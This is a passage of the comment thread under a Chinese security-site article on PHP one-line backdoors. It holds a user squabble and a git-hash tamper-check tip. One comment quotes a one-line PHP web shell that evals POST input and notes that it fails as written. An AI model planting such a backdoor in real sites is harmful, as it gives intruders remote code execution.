		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9060&#39;,&#39;9060&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9060#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@颓废傻鱼 差不多，不过对于现状来说，真正做到人工审计的情况非常有限，对普通公司来说甚至可以说稀有。</p>
<div class="comment-tools">
<div class="vote" id="vote-9060"><span id="acv_stat_9060"></span><a class="ilike_icon" id="vote4-9060" href="javascript:acv_vote(9060,1);">亮了</a>(<span id="cos_support-9060">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9060" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9060" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9060" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9060" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9060" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment odd alt thread-odd thread-alt depth-1" id="li-comment-9064">
    <div id="comment-9064">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic12.png">     </div>
    <div class="tit"> 
	    <span class="name"> asfsdf </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9064&#39;,&#39;9064&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9064#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">6楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>"GET函数"<br>
 -.-</p>
<div class="comment-tools">
<div class="vote" id="vote-9064"><span id="acv_stat_9064"></span><a class="ilike_icon" id="vote4-9064" href="javascript:acv_vote(9064,1);">亮了</a>(<span id="cos_support-9064">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9064" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9064" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9064" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9064" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9064" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-alwaystest even thread-even depth-1" id="li-comment-9066">
    <div id="comment-9066">
        <div class="photo"> <a href="http://www.freebuf.com/author/alwaystest">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/alwaystest" target="_blank">alwaystest&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9066&#39;,&#39;9066&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9066#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">7楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>想问一下提到的&lt;?php eval_r($_POST[亲爱的])?&gt;这个一句话，我没找到php有eval_r这个函数，本地测试返回的是Fatal error: Call to undefined function eval_r() in…</p>
<div class="comment-tools">
<div class="vote" id="vote-9066"><span id="acv_stat_9066"></span><a class="ilike_icon" id="vote4-9066" href="javascript:acv_vote(9066,1);">亮了</a>(<span id="cos_support-9066">1</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9066" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9066" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9066" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9066" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9066" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-oooceo bypostauthor odd alt depth-2" id="li-comment-9067">
    <div id="comment-9067">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9067&#39;,&#39;9067&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9067#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@alwaystest&nbsp;  定义function eval_r达到某些效果。</p>
<div class="comment-tools">
<div class="vote" id="vote-9067"><span id="acv_stat_9067"></span><a class="ilike_icon" id="vote4-9067" href="javascript:acv_vote(9067,1);">亮了</a>(<span id="cos_support-9067">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9067" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9067" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9067" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9067" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9067" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-alwaystest even depth-3" id="li-comment-9126">
    <div id="comment-9126">
        <div class="photo"> <a href="http://www.freebuf.com/author/alwaystest">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/alwaystest" target="_blank">alwaystest&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-12</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9126&#39;,&#39;9067&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9126#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@oooceo&nbsp;  这么定义还是一句话吗？而且这段代码里本来也没给定义的那段啊</p>
<div class="comment-tools">
<div class="vote" id="vote-9126"><span id="acv_stat_9126"></span><a class="ilike_icon" id="vote4-9126" href="javascript:acv_vote(9126,1);">亮了</a>(<span id="cos_support-9126">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9126" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9126" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9126" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9126" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9126" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment byuser comment-author-shanshibo odd alt thread-odd thread-alt depth-1" id="li-comment-9099">
    <div id="comment-9099">
        <div class="photo"> <a href="http://www.freebuf.com/author/shanshibo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/shanshibo" target="_blank">shanshibo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9099&#39;,&#39;9099&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9099#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">8楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>学习了</p>
<div class="comment-tools">
<div class="vote" id="vote-9099"><span id="acv_stat_9099"></span><a class="ilike_icon" id="vote4-9099" href="javascript:acv_vote(9099,1);">亮了</a>(<span id="cos_support-9099">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9099" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9099" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9099" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9099" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9099" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even thread-even depth-1" id="li-comment-71556">
    <div id="comment-71556">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic8.png">     </div>
    <div class="tit"> 
	    <span class="name"> techlivezheng<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71556&#39;,&#39;71556&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71556#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">9楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>对于生产环境使用 git 部署，定期检查 HEAD 的 hash 是否改变，也是一个有效的的防止代码被恶意篡改添加后门的办法，毕竟 Git 的设计使得任何篡改都会有一个独特的 hash 值。</p>
<div class="comment-tools">
<div class="vote" id="vote-71556"><span id="acv_stat_71556"></span><a class="ilike_icon" id="vote4-71556" href="javascript:acv_vote(71556,1);">亮了</a>(<span id="cos_support-71556">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71556" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71556" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71556" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71556" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71556" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment odd alt thread-odd thread-alt depth-1" id="li-comment-71555">
    <div id="comment-71555">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic1.png">     </div>
    <div class="tit"> 
	    <span class="name"> 古道安全<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71555&#39;,&#39;71555&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71555#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">10楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>推荐阅读！我一直想总结这个呢，谢谢分享~</p>
<div class="comment-tools">
<div class="vote" id="vote-71555"><span id="acv_stat_71555"></span><a class="ilike_icon" id="vote4-71555" href="javascript:acv_vote(71555,1);">亮了</a>(<span id="cos_support-71555">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71555" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71555" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71555" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71555" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71555" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even thread-even depth-1" id="li-comment-71554">
    <div id="comment-71554">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic2.png">     </div>
    <div class="tit"> 
	    <span class="name"> 带脚镣跳舞<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71554&#39;,&#39;71554&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71554#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">11楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p><img data-original="http://img.t.sinajs.cn/t3/style/images/common/face/ext/normal/c9/geili_org.gif" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/grey.gif" title="给力"></p>
<noscript>&lt;img src="http://img.t.sinajs.cn/t3/style/images/common/face/ext/normal/c9/geili_org.gif" title="给力" /&gt;</noscript>
<div class="comment-tools">
<div class="vote" id="vote-71554"><span id="acv_stat_71554"></span><a class="ilike_icon" id="vote4-71554" href="javascript:acv_vote(71554,1);">亮了</a>(<span id="cos_support-71554">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71554" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71554" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71554" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71554" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71554" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-anlfi odd alt thread-odd thread-alt depth-1" id="li-comment-9115">
    <div id="comment-9115">
        <div class="photo"> <a href="http://www.freebuf.com/author/anlfi">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(5级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9115&#39;,&#39;9115&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9115#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">12楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@落叶纷飞<br>
哇咔咔~落叶纷飞 我们继续合作一定能带来更多素材的<br>
你只要一直喷我就好了<br>
就算所有人都知道回复我是错误的选择<br>
但是还是有人会冲动的去想改变别人的想法</p>
<p>就像我只要坐下来泡杯茶给你并且跟你说我很赞同你想和你谈谈<br>
大多数人就会自己走进陷阱里来 不用强逼不用绑架 如同飞蛾扑火<br>
你可以去看看犯罪心理学 罪犯之所以是罪犯 就是因为他们善于利用人性<br>
你看我是不是很邪恶？我是坏人吧，尽管诅咒我吧，但其实我都不知道╮(╯▽╰)╭<br>
别和我发好人卡 小心我灭了你</p>
<div class="comment-tools">
<div class="vote" id="vote-9115"><span id="acv_stat_9115"></span><a class="ilike_icon" id="vote4-9115" href="javascript:acv_vote(9115,1);">亮了</a>(<span id="cos_support-9115">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9115" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9115" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9115" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9115" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9115" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment even depth-2" id="li-comment-9120">
    <div id="comment-9120">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic11.png">     </div>
    <div class="tit"> 
	    <span class="name"> ay暗影 </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9120&#39;,&#39;9120&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9120#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@anlfi&nbsp;  看不懂你在说啥，貌似很牛逼的样子</p>
<div class="comment-tools">
<div class="vote" id="vote-9120"><span id="acv_stat_9120"></span><a class="ilike_icon" id="vote4-9120" href="javascript:acv_vote(9120,1);">亮了</a>(<span id="cos_support-9120">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9120" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9120" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9120" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9120" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9120" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-2462 odd alt depth-2" id="li-comment-9125">
    <div id="comment-9125">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E" target="_blank">落叶纷飞&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(2级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9125&#39;,&#39;9125&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9125#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@anlfi   来吧，来灭了我吧，小朋友</p>
<div class="comment-tools">
<div class="vote" id="vote-9125"><span id="acv_stat_9125"></span><a class="ilike_icon" id="vote4-9125" href="javascript:acv_vote(9125,1);">亮了</a>(<span id="cos_support-9125">1</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9125" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9125" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9125" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9125" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9125" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment byuser comment-author-oooceo bypostauthor even thread-even depth-1" id="li-comment-9116">
    <div id="comment-9116">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9116&#39;,&#39;9116&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9116#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">13楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@anlfi<br>
首先这是礼仪问题，你@我，我进行回复@，对于你的观点我完全从来没说过我不赞成或反对，而你也不用来对我或他人发表攻击性言论。但在这我要说，你回复的这句话"其实这些后门在以前都用过了 但写出来对作者有什么意义呢？呵呵"，已经完全改变了很多应有的精神。</p>
<div class="comment-tools">
<div class="vote" id="vote-9116"><span id="acv_stat_9116"></span><a class="ilike_icon" id="vote4-9116" href="javascript:acv_vote(9116,1);">亮了</a>(<span id="cos_support-9116">3</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9116" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9116" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9116" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9116" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9116" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-anlfi odd alt depth-2" id="li-comment-9119">
    <div id="comment-9119">
        <div class="photo"> <a href="http://www.freebuf.com/author/anlfi">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(5级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9119&#39;,&#39;9119&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9119#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@oooceo&nbsp;<br>
呵呵我承认我凌乱了<br>
不过并我没有攻击谁<br>
你认为是对你的伤害 也只能说sorry<br>
而且只是比喻而已 主观上只是想帮你补充一个未收录的后门而已<br>
还有我并不了解你 如果你认为我说的不对 不对胃口 那就请无视我吧<br>
其实我也经历过很多这样的说教 当你做了很多很多以后<br>
领导跟你说 你做这些又有什么意义 我只要能赚钱<br>
所以你也别太在乎别人 那些你观点不同不喜欢的人就别和他说话 尽量避免争吵（对方只是无聊的人而已<br>
有些人喷你写的不好 就不高兴 有些人说你写的不错 你就开心 尽量理智应对吧</p>
<p>可见你关注的首先1是礼仪 2是观点 3是理论 彼此了解才能有交流对吧<br>
如果你还有后续文章我会努力关注的</p>
<div class="comment-tools">
<div class="vote" id="vote-9119"><span id="acv_stat_9119"></span><a class="ilike_icon" id="vote4-9119" href="javascript:acv_vote(9119,1);">亮了</a>(<span id="cos_support-9119">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9119" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9119" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9119" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9119" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9119" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-oooceo bypostauthor even depth-3" id="li-comment-9121">
    <div id="comment-9121">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9121&#39;,&#39;9119&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9121#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>谢谢！</p>
<div class="comment-tools">
